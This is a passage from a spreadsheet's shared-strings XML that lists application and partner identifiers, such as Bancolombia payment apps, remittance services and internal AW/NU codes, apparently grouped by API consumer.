    <t>BANCOLOMBIAPAY APP; MONET COLOMBIA SAS</t>
  </si>
  <si>
    <t>APP_AAA; TransferWise_TNW; MonitoreoDCM_AAA; Remitly_RTY; Uniteller_UTL; OmnexGroup_UNO; More_MOR; WorldRemit_WRT; RiaFinancialServices_RIA; SmallWorld_OMX; Moneygram_MNR</t>
  </si>
  <si>
    <t>MUVERANG_NU0063001; MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>Domina; MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>CarventuriApiVehiculos_AW1097001; PuntoAliadoApiVehiculos_AW1097001</t>
  </si>
  <si>
    <t>WllsWeb_AW1385001; MonitoreoDCM_AAA</t>
  </si>
  <si>
    <t>PRAGMA; MonitoreoDCM_AAA; TAXIS SAN JUAN; Zencillo Automatización; A PAGAR V2; PruebasIntegración; SmartPayment POS EGlobalT; Backend de Taxis Libres App; Propia; BE MOVIL; POS 4.0; Autocab driver companyon; BAGUER; D y S SAS; PagoCI24; TAXI TAXI; APP IMPULSADOR; AUTOCAB; RADIO TAXI; AUTOCAB ASISTENTE CONDUCTOR; Tax Andaluz; Payment Gateway controles inteligentes; MOVIVA; Cegid V.2.0; PTM; zencillo Capturador; TAXIS VERDES; COOPEBOMBASV2</t>
  </si>
  <si>
    <t>Soycoopebombas; TAXIA LIFE APP; CONDUCTOR TAX INDIVIDUAL; APP TORO AUTOS; SMART ONE; Mis Aliados; LOS MOVILES; Cegid; MOVIVA; AUTOCAB; TAXIS VERDES; 322 APP; AUTOCAB ASISTENTE CONDUCTOR; TAXI TAXI; RADIO TAXI; A PAGAR</t>
  </si>
  <si>
    <t>MonitoreoDCM_AAA; CarventuriApiVehiculos_AW1097001; PuntoAliadoApiVehiculos_AW1097001</t>
  </si>
  <si>
    <t>WOMPI; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>TIGOUNE; Tuya; Tigo une prueba APP; VIRGINMOBILEAPP; Baguer SAS; SERVICIOS DE SALUD IPS SURAMERICANA S.A.S.; OPERACIONES GENERALES SURAMERICANA SAS; SERVICIOS GENERALES SURAMERICANA S.A.S.; CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA; SEGUROS GENERALES SURAMERICANA SA; SEGUROS DE VIDA SURAMERICANA SA; EPS SURAMERICANA S.A.; FONYOU COLOMBIA SAS; INVERSORA EBCO APP; ABC PAGOS; LYRAAPP; CLAROAPP; SUPERPAGOSAPP; ZONA PAGOS; Place to Pay; T atiendo Boton Bancolombia; Boton Bancolombia; E-collect; App_Blendex_BotonBancolombia; ofrendaappbc; ALKOSTO BOTON BANCOLOMBIA; WOMPI APP; BC_Herramientas_MonitoreoPrd; COMFAMA APP; SISTECREDITO SAS; PAYMENTEZ APP; FONVALMED</t>
  </si>
  <si>
    <t>Vinculación Digital; CHATBOT; Dummy; BC Portal de Contenido_AW1218001</t>
  </si>
  <si>
    <t>Carventuri; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>CHATBOT; Vinculación Digital; Dummy; Remitly APP1_RTY; BC Portal de Contenido_AW1218001; TransferWise_TNW</t>
  </si>
  <si>
    <t>WorldRemit_WRT; BC_Herramientas_MonitoreoPrd; Carventuri; Uniteller_UTL; BCHerramientasMonitoreo_AAA; WOMPI; TIGOUNE; Tuya; VIRGINMOBILEAPP; SmallWorld_OMX; Baguer SAS; SERVICIOS DE SALUD IPS SURAMERICANA S.A.S.; OPERACIONES GENERALES SURAMERICANA SAS; SERVICIOS GENERALES SURAMERICANA S.A.S.; CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA; SEGUROS GENERALES SURAMERICANA SA; SEGUROS DE VIDA SURAMERICANA SA; EPS SURAMERICANA S.A.; FONYOU COLOMBIA SAS; INVERSORA EBCO APP; ABC PAGOS; LYRAAPP; CLAROAPP; SUPERPAGOSAPP; ZONA PAGOS; Place to Pay; T atiendo Boton Bancolombia; Boton Bancolombia; E-collect; App_Blendex_BotonBancolombia; ofrendaappbc; ALKOSTO BOTON BANCOLOMBIA; WOMPI APP; COMFAMA APP; SISTECREDITO SAS; PAYMENTEZ APP; FONVALMED</t>
  </si>
  <si>
    <t>APP Cayman; Cayman_Soporte; TMP EDIN APP_AW1276001; TEMP MAM_AW1204; BC_Herramientas_Monitoreo; TMP1 johucorr_AW0360010; APOLO_AW0360010; App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001; BC_Herramientas_Monitoreo; App inversionesGB_AW1185001; APOLO_AW0360010</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW1185001; TMP2 johucorr_AW1185001; BC_Herramientas_Monitoreo; App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW1185001; TMP2 johucorr_AW1185001; BC_Herramientas_Monitoreo; App inversionesGB_AW1185001; APOLO_AW0360010</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001; BC_Herramientas_Monitoreo; Cayman_Soporte; APOLO_AW0360010; App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001; BC_Herramientas_Monitoreo</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001; App inversionesGB_AW1185001; APOLO_AW0360010; BC_Herramientas_Monitoreo; MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW0360010; App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>APP Cayman; Cayman_Soporte; TMP EDIN APP_AW1276001; TEMP MAM_AW1204; BC_Herramientas_Monitoreo; TMP2 johucorr_AW1185001; App inversionesGB_AW1185001; TMP1 johucorr_AW0360010; APOLO_AW0360010</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001; BC_Herramientas_Monitoreo; App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>App inversionesGB_AW1185001; BC_Herramientas_Monitoreo</t>
  </si>
  <si>
    <t>TPM ALM APP_AW0955001; Ecosistema De Pagos_AW1314001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>TPM ALM APP_AW0955001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Billetera Movil; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Visor Interactivo_AW1249; Prometeo_AW0360009; GestionaNegocios_AW1302001; Aplicación Transversal de Lealtad - ATL_AW1284; Boton Bancolombia_AW1277001; PortalSalaDeVentas_AW1258002; BC_Herramientas_MonitoreoPrd; MUVERANG_NU0063001; MarketplaceEcosistemasPersonas_NU0035001; Transfiya_NU0017001; MovilidadCore_AW1281002; PORTALCOBRANZA_AW1294001; VisorInteractivo_AW1249; HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>APM_AW1097001; BC_Herramientas_MonitoreoPrd; NU0037002_VDSORQUESTADORAUTOGESTION_BACK; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>Boton Bancolombia_AW1277001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>AppNotifications_AW0360009; Tracking_AW1286001; Prometeo_AW0360009; PayProMerchant_AW1235001; BC_Herramientas_MonitoreoPrd; Boton Bancolombia_AW1277001; GestionaNegocios_AW1302001; TPM ALM APP_AW0955001</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001; BC_Herramientas_MonitoreoPrd; AppInversiones_AW1185001; BilleteraMovil_AW1190001</t>
  </si>
  <si>
    <t>NEQUICLIENTES_AW1011; BCHerramientasMonitoreoPrd2</t>
  </si>
  <si>
    <t>MarketplaceEcosistemasPersonas_NU0035001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>VentasDigitalesSufi_NU0037; MovilidadCore_AW1281002</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>PortalLibranzas_AW0360007; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>EDPYME_AW1170; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001; CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>Modulo Administrativo Canales Digitales_AW1204; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>BC_Herramientas_Monitoreo; BC_Herramientas_MonitoreoPrd; TMP Boton Bancolombia_BDT; GestionaNegocios_AW1302001; PortalSalaDeVentas_AW1258002; plink_AW1206001; MascaraTransaccional_NU0021001; PORTALCOBRANZA_AW1294001; APM_NU0032001; LifeCoach_AW1240001; CapaGestionCanal_NU0014001; Recargas_AW1300001; TabotWhatsapp_AW1165; MarketplaceEcosistemasPersonas_NU0035001; NEQUIMDM_AW1011; creditlens_NU0038001; MovilidadCore_AW1281002; HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; plink_AW1206001; MarketplaceEcosistemasPersonas_NU0035001; MovilidadCore_AW1281002; HabitatCore_AW1281003; GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; creditlens_NU0038001; GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>SVETDL_AW0360006; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; SUID_AW1310; PortalSalaDeVentas_AW1258002; MarketplaceEcosistemasPersonas_NU0035001; creditlens_NU0038001; MovilidadCore_AW1281002; CapaGestionCanal_NU0014001; HabitatCore_AW1281003; GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001; BC_Herramientas_MonitoreoPrd; NEQUICUEDEP_AW1011; EDPYME_AW1170; CapaGestionCanal_NU0014001; PORTALCOBRANZA_AW1294001</t>
  </si>
  <si>
    <t>BC_Herramientas_Monitoreo; BC_Herramientas_MonitoreoPrd; TMP Boton Bancolombia_BDT</t>
  </si>
  <si>
    <t>MACINV-RPA20190002_AW1172001; BC_Herramientas_MonitoreoPrd; MarketplaceEcosistemasPersonas_NU0035001; BIZAGIAC_AW1285001; HabitatCore_AW1281003; Historia del Cliente_NU0090001</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; BALMTEC_AW0955; PORTALCOBRANZA_AW1294001; PortalLibranzas_AW0360007</t>
  </si>
  <si>
    <t>Ecosistema De Pagos_AW1314001; GestionaNegocios_AW1302001; BC_Herramientas_MonitoreoPrd; EDPYME_AW1170; BALMTEC_AW0955; Portal Contenidos Bancolombia_AW1218001</t>
  </si>
  <si>
    <t>TMP_SVP_APP_PFM; TMP SOPORTE APP_lgcorrg; TMP AW0360004_CONSTRUCTOR_SVE; BC_Herramientas_Monitoreo; BC_Herramientas_MonitoreoPrd; GestionaNegocios_AW1302001; TABOT_AW1165001; SVETDL_AW0360006; PortalLibranzas_AW0360007; BALMTEC_AW0955; MarketplaceEcosistemasPersonas_NU0035001; AppInversiones_AW1185001</t>
  </si>
  <si>
    <t>TMP Boton Bancolombia_BDT; SUID_AW1310; MascaraTransaccional_NU0021001; PortalConstructor_AW0360004; AppInversiones_AW1185001; MarketplaceEcosistemasPersonas_NU0035001; BCHerramientasMonitoreoPrd2; FUA_AW1291001; NEQUIMAPAS_AW1011; CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>TMP Boton Bancolombia_BDT; BC_Herramientas_Monitoreo; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; VisorInteractivo_AW1249</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; BALMTEC_AW0955; BCHerramientasMonitoreoPrd2; TABOT_AW1165001; NEQUIMAPAS_AW1011</t>
  </si>
  <si>
    <t>HabitatCore_AW1281003; JornadaPagos_AW1316001</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001; BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; CapaGestionCanal_NU0014001; Tokenizacion_NU0019001; Recargas_AW1300001; Tokenizacion_NU0103001</t>
  </si>
  <si>
    <t>EDPYME_AW1170; BC_Herramientas_MonitoreoPrd; CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>TMP_SVP_APP_PFM; TMP Boton Bancolombia_BDT; BC_Herramientas_Monitoreo; BC_Herramientas_MonitoreoPrd; TMP SOPORTE APP_lgcorrg; MarketplaceEcosistemasPersonas_NU0035001; FUA_AW1291001</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd; plink_AW1206001</t>
  </si>
  <si>
    <t>AW0718001;AW0504001;AW0360</t>
  </si>
  <si>
    <t>SVE;AW0360</t>
  </si>
  <si>
    <t>AW0611001;AW0795</t>
  </si>
  <si>
    <t>SU2;CDT;AW0210001;SVP;SU5;SVE;AW1218001</t>
  </si>
  <si>
    <t>AW1285001;AW0856;AW0360007</t>
  </si>
  <si>
    <t>SU2;AW0210001;SVP;GDE;APP;SU5;SVE</t>
  </si>
  <si>
    <t>SAI;AFC;SUC;GOLF;AW1110001</t>
  </si>
  <si>
    <t>AW01065;APIC;NU0017001;AW0638;AW1269001;AW1170;AFC;NU0004001;AW1078001;AW1300001;AW1311;AW1365;AW1298001;AW1011;AW0638001;AW1110001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1405001</t>
  </si>
  <si>
    <t>AW0499;AW1176;AW0922;AW0856</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0084001</t>
  </si>
  <si>
    <t>AW1128;NU0051001;AW1291001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;AW0748001;AW1170;AW1287001;NU0101001;NU0004001;AW1287;AW1128;AW1011;AW1185001;NU0100001;AW1316001;AW1277001;DEVELOPSOATEST;NU0199001</t>
  </si>
  <si>
    <t>AW1177;AW1170;AW1128</t>
  </si>
  <si>
    <t>DEVELOPSOATEST;PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>DEVELOPSOATEST;PRODUCTORCONSUMIDOR;NU0102001</t>
  </si>
  <si>
    <t>GDE;PSE;SVE</t>
  </si>
  <si>
    <t>AW0748001;AW1312001;NU0034001;AW1281003</t>
  </si>
  <si>
    <t>AW1097001;AW0939;NU0034001;AW1281003</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0084001;AW1258011</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0091001;NU0170001;AW1177001</t>
  </si>
  <si>
    <t>AW1074001;NU0038001;NU0051001;AW1249001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0021001</t>
  </si>
  <si>
    <t>AW1285001;AW0856</t>
  </si>
  <si>
    <t>AW1285001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW0922;TP;Allus</t>
  </si>
  <si>
    <t>NU0021001;AW1170;DEVELOPSOATEST;AW0955001;NU0146001;NU0149001;NU0215001;NU0051001</t>
  </si>
  <si>
    <t>AW1177;AW1285001;AW1128</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0021001;AW1176;AW1258011;NU0051001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0091001;NU0169001;NU0170001</t>
  </si>
  <si>
    <t>AW1177;AW1128;NU0170001;NU0104001</t>
  </si>
  <si>
    <t>AW01065;AW0937;SU2;AW1176;AW0856;SUF;AW1272001;AW1170;AFC;AW0709001;AW1311;AW1365;AW1110001</t>
  </si>
  <si>
    <t>AW1208001;AW1208;AW1298001;NU0160001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1258011</t>
  </si>
  <si>
    <t>GDE;AFC;AW1110001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1373;NU0104001;NU0064001;AW1315014;NU0010001;AW1258011;NU0139001;AW1365;NU0014001;AW1326001;PRODUCTORCONSUMIDOR;AW1315001;NU0091001;NU0146001;AW1151001;NU0001001;AW0360006;NU0142001;NU0135001</t>
  </si>
  <si>
    <t>AW1313;AW1170;AW1287</t>
  </si>
  <si>
    <t>NU0102001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>NU0102001;AW0407;AW1313;AW1316001;AW0360007;AW1170;NU0100001;NU0004001;NU0103001;DEVELOPSOATEST;AW1185001;AW1316;NU0147001;NU0104001;NU0170001;AW0955001;AW1299001</t>
  </si>
  <si>
    <t>NU0102001;AW1176;AW0856;AW1313;AW1294001;NU0114001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>ISSU20003;AW1312001;NU0204001;NU0093001</t>
  </si>
  <si>
    <t>AW1177;AW1313001;AW0856;AW1299001;AW1176001;AW1128;AW1249;AW1249001</t>
  </si>
  <si>
    <t>AW0899001;AW1074001;SVP;NU0038001;AW1285001;AW1176;NU0254001</t>
  </si>
  <si>
    <t>NU0102001;NU0098001;AW0360004;AW0748001;AW1281002;NU0143001;AW1074001;SVP;AW0611001;AW1206001;AW0360007;NU0104001;AW1302001;NU0004001;NU0064001;AW1281003;NU0010001;AW1313001;NU0035001;AW1151001;NU0046001;NU0146001;NU0149001;NU0142001;AW1326001;AW1365;AW1218001;AW1285001;NU0170001;AW1176;AW0660001;AW0661003;NU0152001;AW1272001;AW1480001;NU0219001;NU0091001;NU0254001;NU0139001</t>
  </si>
  <si>
    <t>AW0748001;AW1285001;AW0661003;NU0254001;AW1074001</t>
  </si>
  <si>
    <t>NU0102001;NU0034001;AW0360004;AW0748001;AW0899001;AW1258002;AW1281002;NU0143001;AW1074001;SVP;NU0038001;AW1272001;AW0611001;GDE;NU0104001;NU0014001;AW1302001;AW1310;NU0064001;AW1281003;NU0139001;APP;AW1108001;AW0955;PRODUCTORCONSUMIDOR;CIF;AW1313001;AUD;NU0035001;AW1151001;NU0046001;NU0146001;NU0149001;NU0142001;AW0638;AW1365;NU0004001;AW1326001;AW1285001;NU0135001;NU0170001;AW1435001;AW1176;AW0661003;AW1480001;AW1184003;NU0219001;NU0091001;NU0254001</t>
  </si>
  <si>
    <t>AW0360004;AW1074001;NU0142001;NU0135001;AW1285001;AW1176001;NU0091001;NU0046001;NU0254001</t>
  </si>
  <si>
    <t>AW0748001;AW1074001;NU0139001;NU0254001</t>
  </si>
  <si>
    <t>AW01065;SVP;GDE;SVE</t>
  </si>
  <si>
    <t>AW1170;PRODUCTORCONSUMIDOR;NU0001001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0091001</t>
  </si>
  <si>
    <t>AW1170;AW1287;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>NU0017001;AW1272001;AW1302001;SVE;AW0360</t>
  </si>
  <si>
    <t>NU0021001;AW1272001;AW1218001</t>
  </si>
  <si>
    <t>AW0637001;AW0360004;SVE;AW1185001;AW1177001;NU0170001</t>
  </si>
  <si>
    <t>AW1185001;NU0021001;NU0149001;AW1177001;SVE;NU0160001;NU0170001;NU0153001;NU0146001;AW0955001;NU0051001</t>
  </si>
  <si>
    <t>NU0102001;AW0360004;AW1285001;AW0748001;AW0899001;AW1074001;SVP;NU0038001;AW1272001;AW1302001;MAT;NU0114001;AW1313001;NU0046001;AW1326001;AW1250;NU0135001;NU0021001;AW1249001;NU0034001;AW1281003;NU0032001;AW1176;AW0661003;AW1151001;AW1176001;NU0254001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0091001;NU0170001</t>
  </si>
  <si>
    <t>AW1176;AW0922;AW1294001</t>
  </si>
  <si>
    <t>NU0021001;PRODUCTORCONSUMIDOR;NU0146001;NU0149001</t>
  </si>
  <si>
    <t>APIC;AW1176;AW0856;AW0360004</t>
  </si>
  <si>
    <t>STI;AW1123001;GDE;TP;Allus</t>
  </si>
  <si>
    <t>AW1294001;AW0360007</t>
  </si>
  <si>
    <t>AW1313;AW1294001;AW1272001;AW0360007;AW1170;AW0955;DEVELOPSOATEST;AW0955001</t>
  </si>
  <si>
    <t>ALM;SVP;GDE;APP;PSE;SVE</t>
  </si>
  <si>
    <t>APIC;AW1170</t>
  </si>
  <si>
    <t>STI;AW0922;GDE;TP;Allus</t>
  </si>
  <si>
    <t>CDT;NU0014001;DEVELOPSOATEST;SVE;AW0955001;NU0153001;NU0146001;NU0149001</t>
  </si>
  <si>
    <t>DEVELOPSOATEST;PRODUCTORCONSUMIDOR;APICONNECT</t>
  </si>
  <si>
    <t>AW1177;AW1373;SLT;AW0856;AW1294001;NU0129001;AW1176;AW1285001;AW1206001;AW1258001;AW1170;AW1281002;NU0034001;AW0638;AW0922;AW1302001;AW1203001;NU0017001;AW0998;AW1258011;AW1258002;AW0360009;NU0064001;AW1097001;AW0683001;NU0142001;NU0143001;AW1011;AW1281003;AW1128;NU0139001;NU0035001;AW1311;AW1183001;AW1315014;AW1081001;NU0163001;AW1151001;AW0682001;AW1333002;AW1279001;AW1277001;AW1365;AW0434001;NU0063001;NU0135001;AW0661003;NU0046001;AW1480001;AW0629001;AW0955001</t>
  </si>
  <si>
    <t>AW0748001;AW1240001;AW1281002;NU0032001;NU0021001;AW1074001;SVP;NU0038001;NU0014001;AW1165;AW1281003;AW1011;NU0035001;AW1218001;AW0661003</t>
  </si>
  <si>
    <t>AW0842001;AW1074001;AW1185001;AW0360010</t>
  </si>
  <si>
    <t>AW1176;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1176;AW0922</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0153001</t>
  </si>
  <si>
    <t>AW1176;AW0638;AW1272001;NU0001;AW1133;AW0659;AW1203001;NU0142001;AW1218001</t>
  </si>
  <si>
    <t>AW01010;AW0748001;SUF;PRODUCTORCONSUMIDOR;BVL;AW1010001</t>
  </si>
  <si>
    <t>AW1272001;NU0010001;AW1218001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;NU0021001;NU0146001;NU0149001</t>
  </si>
  <si>
    <t>DEVELOPSOATEST;NU0163001;PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>AW1209001;ISSU20003;AW1097001;NU0093001</t>
  </si>
  <si>
    <t>AW1097001;NU0021001;NU0093001;ISSU20003;NU0204001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1151001;NU0021001</t>
  </si>
  <si>
    <t>AW1170;AW1258011</t>
  </si>
  <si>
    <t>NU0063001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;AW1313001;AW1294001</t>
  </si>
  <si>
    <t>AW1177;AW0937;ELIBOM;AW1285001;AW0856;AW0638;BSN;AW1287;AW1128;AW1011</t>
  </si>
  <si>
    <t>AW01065;AW1176;BSN;AW1170</t>
  </si>
  <si>
    <t>AW1294001;SVP;AW1218001</t>
  </si>
  <si>
    <t>AW0922;AW0611001;TP;Allus;AW1294001;NU0084001</t>
  </si>
  <si>
    <t>AW1170;AW1165</t>
  </si>
  <si>
    <t>NU0017001;AW0856;AW1294001;AW1316001;AW1169;AW1170;NU0014001;AW1165;AW1302001;AW1011;SVE;AW1316</t>
  </si>
  <si>
    <t>AW1177;AW0638;BSN;AW1269001;AW1272001;AW1170</t>
  </si>
  <si>
    <t>AW1185001;AW0360010</t>
  </si>
  <si>
    <t>AW1285001;AW1294001;AW1316001;AW1272001;AW1165;NU0019001;NU0064001;AW1250;NU0103001;AW1316;AW1218001</t>
  </si>
  <si>
    <t>NU0021001;NU0100001;NU0101001;AW1405001;PRODUCTORCONSUMIDOR;DEVELOPSOATEST;AW1316001;AW0955001;AW1184;AW1151001;NU0146001;NU0153001;NU0149001;AW1184003</t>
  </si>
  <si>
    <t>NU0021001;NU0019001;NU0103001</t>
  </si>
  <si>
    <t>NU0021001;NU0100001;NU0101001;PRODUCTORCONSUMIDOR;NU0091001;DEVELOPSOATEST;NU0104001;AW1184;AW1184003</t>
  </si>
  <si>
    <t>AW1189001;AW1170</t>
  </si>
  <si>
    <t>APIC;AW1176;AW1285001;AW1294001;NU0114001;AW1287</t>
  </si>
  <si>
    <t>NU0102001;AW1285001;AW0856;AW1313</t>
  </si>
  <si>
    <t>AW0937;AW0856</t>
  </si>
  <si>
    <t>SVP;AW1011;AW0360</t>
  </si>
  <si>
    <t>AW0937;AW1176;AW1081001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1097001;AW1081001</t>
  </si>
  <si>
    <t>AW0922;AW0856</t>
  </si>
  <si>
    <t>AW1097001;AW1081001;AW0939</t>
  </si>
  <si>
    <t>SAI;SVE;SCI;SVP;NU0004001;AUD</t>
  </si>
  <si>
    <t>AW0360004;SVE;NU0004001;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW0611001;AW0360</t>
  </si>
  <si>
    <t>AW1177;ELIBOM;AW0922;AW0856;AW1097001;AW0998;BSN;AW1170;SYC;AW0683001;AW1128;AW1011;AW0540001;BancasegurosNube;AW0682001</t>
  </si>
  <si>
    <t>AW0922;AW0856;AW1097001;AW1170;AW1302001;AW1081001;NU0142001;AW0660001</t>
  </si>
  <si>
    <t>AW0922;SYC</t>
  </si>
  <si>
    <t>AW0453;AW0718001</t>
  </si>
  <si>
    <t>AW0638;AW0636</t>
  </si>
  <si>
    <t>NU0102001;NU0127001;NU0004001;NU0034001;AW1170;AW1176</t>
  </si>
  <si>
    <t>AW0718001;AW0611001;AW0683001;AW0563001</t>
  </si>
  <si>
    <t>ELIBOM;AW0856</t>
  </si>
  <si>
    <t>AW0937;ELIBOM;AW0856</t>
  </si>
  <si>
    <t>NU0102001;ELIBOM;AW1285001;AW0856;AW1313;AW0955;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW1011;AW1203001</t>
  </si>
  <si>
    <t>AW0638;AW1011;NU0034001;AW1203001</t>
  </si>
  <si>
    <t>AW1177;AW1128</t>
  </si>
  <si>
    <t>APIC;AW1170;NU0004001;AW1185001</t>
  </si>
  <si>
    <t>AW1208001;AW0937;AW0922;AW0856;AW1097001;AW0638;AW1142001;TP</t>
  </si>
  <si>
    <t>AW1170;NU0014001;NU0100001;NU0019001;AW1300001;AW0955;NU0103001;DEVELOPSOATEST;NU0147001;NU0094001;AW0955001;AW1435001;AW1315001;AW1404002;NU0154001;AW1277001;NU0034001;NU0106001</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;AW1070;AW1285001;AW1373;AW0407;AW1313;AW1097001;AW1272001;AW0398;AW1206001;AW0360007;AW1170;AW1287001;AW1277001;AW1302001;NU0100001;NU107001;NU0004001;AW1315001;AW1128;NU0090001;AW1281003;BIZ;AW0360009;AW1172001;AW1287;DEVELOPSOATEST;NU0035001;AW1151001;AW1218001;NU0034001;AW1185001;NU0010001;NU0143001;AW1176;NU0013001;NU0170001;NU0113001;AW0660;NU0102001;NU0046001;AW1299001;AW1281002;NU0137001</t>
  </si>
  <si>
    <t>AW0407;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>AW0937;AW1108001</t>
  </si>
  <si>
    <t>AW0922;AW1108001</t>
  </si>
  <si>
    <t>NU0100001;ISPCC0002</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;AW1285001;AW0856;AW1373;AW0407;AW1313;AW1097001;NU0109001;AW1316001;AW0360007;AW1287001;AW1235002;NU0100001;NU107001;NU0004001;AW1315001;AW1287;AW1286001;AW1128;AW1081001;AW0157;AW0939001;NU0010001;DEVELOPSOATEST;AW0955001;AW1185001;AW1313001;AW0214001;AW1151001</t>
  </si>
  <si>
    <t>AW0937;AW1285001;AW0856;AW1011;APICONNECT;PRODUCTORCONSUMIDOR;AW1299001;AW0955001</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;NU0034001;AW1097001;AW0638;NU0127001;AW1206001;AW1170;NU0104001;NU0014001;AW1165;NU0004001;AW1287;AW1150;AW1128;AW1312001;AW0955;AW0939;AW1011;AW0638001;DEVELOPSOATEST;AW0955001;AW1203001;AW1316;NU01270012;NU0046001;AW0660;AW1435001;AW1299001;NU0204001</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;NU0004001;AW1287;AW1128;AW1185001;DEVELOPSOATEST;NU0100001;AW1316001;AW1277001;NU0199001</t>
  </si>
  <si>
    <t>AW1177;AW1128;DEVELOPSOATEST</t>
  </si>
  <si>
    <t>APIC;AW1177;AW0937;AW1287;AW0856;AW1313;AW0638;AW1170;AW1128;AW1203001</t>
  </si>
  <si>
    <t>AW1281002;NU0021001;NU0143001;NU0104001;AW1333002;AW1190001;AW0453001;NU0004001;AW1128;APICONNECT;AW1281003;NU0035001;AW1218001;NU0046001;AW1291001;NU0094001;NU0162001;AW1277001;DEVELOPSOATEST;NU0170001;NU0199001;AW1435001</t>
  </si>
  <si>
    <t>AW1170;DEVELOPSOATEST;AW1185001;NU0021001</t>
  </si>
  <si>
    <t>AW1074001;NU0254001</t>
  </si>
  <si>
    <t>AW1281002;AW1128;AW0955;NU0051001;AW0955001;AW1291001;AW1170;DEVELOPSOATEST;NU0170001;AW1435001;NU0034001</t>
  </si>
  <si>
    <t>AW1294001;NU0021001;Allus</t>
  </si>
  <si>
    <t>BVD;AW0210001;AFC;AW1110001</t>
  </si>
  <si>
    <t>AFC;AW1110001</t>
  </si>
  <si>
    <t>AW01065;GDE;SVE</t>
  </si>
  <si>
    <t>AW1177;NU0104001;AW1128;AW1108001;NU0170001</t>
  </si>
  <si>
    <t>AW0360010;NU0146001;PRODUCTORCONSUMIDOR;NU0135001</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR;DEVELOPSOATEST;NU0084001;NU0051001</t>
  </si>
  <si>
    <t>NU0014001;AW1300001;AW0955;DEVELOPSOATEST;AW1277001</t>
  </si>
  <si>
